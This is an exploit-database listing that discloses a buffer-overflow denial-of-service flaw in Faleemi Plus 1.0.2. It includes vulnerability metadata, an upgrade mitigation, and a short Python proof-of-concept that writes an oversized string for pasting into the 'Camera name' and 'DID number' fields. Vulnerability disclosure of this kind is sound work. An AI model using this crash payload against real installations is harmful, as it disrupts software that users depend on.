Faleemi Plus 1.0.2 - Denial of Service (PoC)

vendor:

Faleemi Plus

by:

Gionathan 'John' Reale

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Faleemi Plus

Affected Version From: 1.0.2

Affected Version To: 1.0.2

Patch Exists: YES

Related CWE: N/A

CPE: a:faleemi:faleemi_plus:1.0.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2018

Faleemi Plus 1.0.2 – Denial of Service (PoC)

A buffer overflow vulnerability exists in Faleemi Plus 1.0.2, which could allow an attacker to cause a denial of service condition. By running a specially crafted python exploit script, an attacker can create a new file with the name 'exploit.txt' and copy the text inside 'exploit.txt' and start the program. By clicking 'Add Camera' and pasting the content of 'exploit.txt' into the 'Camera name' and 'DID number' fields, an attacker can cause a crash.

Mitigation:

Upgrade to the latest version of Faleemi Plus.

Source

Exploit-DB raw data:

# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)  
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-14
# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
# Tested Version: 1.0.2
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Now click "Add Camera" and in the new 
# window paste the content of "exploit.txt" into the following fields:
# "Camera name" & "DID number". Click "Add" and you will see a crash.

#!/usr/bin/python
   
buffer = "A" * 2000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"